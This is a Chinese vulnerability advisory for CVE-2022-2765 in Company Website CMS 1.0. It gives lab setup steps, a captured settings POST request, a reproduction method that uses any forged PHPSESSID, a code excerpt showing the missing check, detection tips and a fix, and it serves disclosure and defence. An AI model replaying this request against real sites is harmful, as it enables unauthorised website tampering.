Company Website CMS未授权网站篡改漏洞(CVE-2022-2765)
*一、漏洞概述 **
*1.1 漏洞简介*
·漏洞名称:Company Website CMS未授权网站篡改漏洞
·漏洞编号:CVE-2022-2765
·漏洞类型:未授权篡改漏洞
·漏洞威胁等级:超危
·影响范围:Company Website CMS 1.0
·利用条件:默认配置
*1.2 组件描述*
Company Website CMS是Torrahclef个人开发者的一个公司网站/CMS。
*1.3 漏洞描述*
Company Website CMS 1.0存在访问控制错误漏洞,该漏洞源于文件/dashboard/settings的未知功能受到影响,导致不正确的身份验证,攻击可以远程发起,该漏洞利用已向公众披露并可能被使用。
*二、漏洞复现*
*2.1 应用协议*
http
*2.2 环境搭建*
1.下载源码到本地:https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code
2.在本地phpmyadmin提前建立数据库
3.配置z_db.php文件
4.访问即可
*2.3 漏洞复现 **
1.漏洞地址为:Company Website CMS/dashboard/settings
2.为了复现未授权访问,提前先登录admin管理员获取该功能点的请求体
POST /Company%20Website%20CMS/dashboard/settings HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33605517253375376845672324753
Content-Length: 1638
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Company%20Website%20CMS/dashboard/settings
Cookie:PHPSESSID=gbkblf3q6p9q80kqfdvks2ofs6
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_title"
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_keyword"
Church, Marketing
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_desc"
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias accusamus harum ullam tempore debitis et, expedita, repellat delectus aspernatur neque itaque qui quod.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_about"
Young coders can use events to coordinate timing and communication between different sprites or pieces of their story. For instance, the when _ key pressed block is an event that starts code whenever the corresponding key on the keyboard is pressed.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_footer"
© 2022 All Rights Reserved
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="follow_text"
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_url"
http://localhost:8080/vogue/
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="save"
-----------------------------33605517253375376845672324753--
3.退出管理员用户,用普通身份进入前台,通过任意构造cookie字段中的PHPSESSID即可更改
*三、漏洞分析*
*3.1 技术背景*
\
*3.2 代码分析*
更改site-setting配置时没有对用户的cookie做校验,导致任意PHPSESSID都可以修改
<?php
$status = "OK"; //initial status
$msg="";
if(ISSET($_POST['save'])){
$site_keyword = mysqli_real_escape_string($con,$_POST['site_keyword']);
$site_desc = mysqli_real_escape_string($con,$_POST['site_desc']);
$site_title = mysqli_real_escape_string($con,$_POST['site_title']);
$site_about = mysqli_real_escape_string($con,$_POST['site_about']);
$site_footer = mysqli_real_escape_string($con,$_POST['site_footer']);
$follow_text = mysqli_real_escape_string($con,$_POST['follow_text']);
$site_url = mysqli_real_escape_string($con,$_POST['site_url']);
*3.3 流量分析 **
和正常流量不同的是,攻击者是构造cookie值 --PHPSESSID字段来绕过验证,构造的id值和正常的值明显不同
正常的admin phpsessid为小写字母+数字随机合成26位的组合
*3.4 绕过方式*
设置任意PHPSESSID来绕过验证
*四、漏洞检测*
*4.1 组件版本自检*
以下版本受该漏洞影响:Company Website CMS 1.0
目前最高版本:Company Website CMS 1.0
*4.2 研判建议 **
登录后台查看cookie值观察请求包的格式是否和真是cookie类似,若明显不同,查看请求头body部分,观察是否存在恶意的语句影响到网站
*五、防范建议*
*5.1 官方修复建议*
未修复
*5.2 临时修复建议*
在设置setting的字段值时校验cookie是否为admin管理员用户
六、*参考链接*
源码下载url:https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code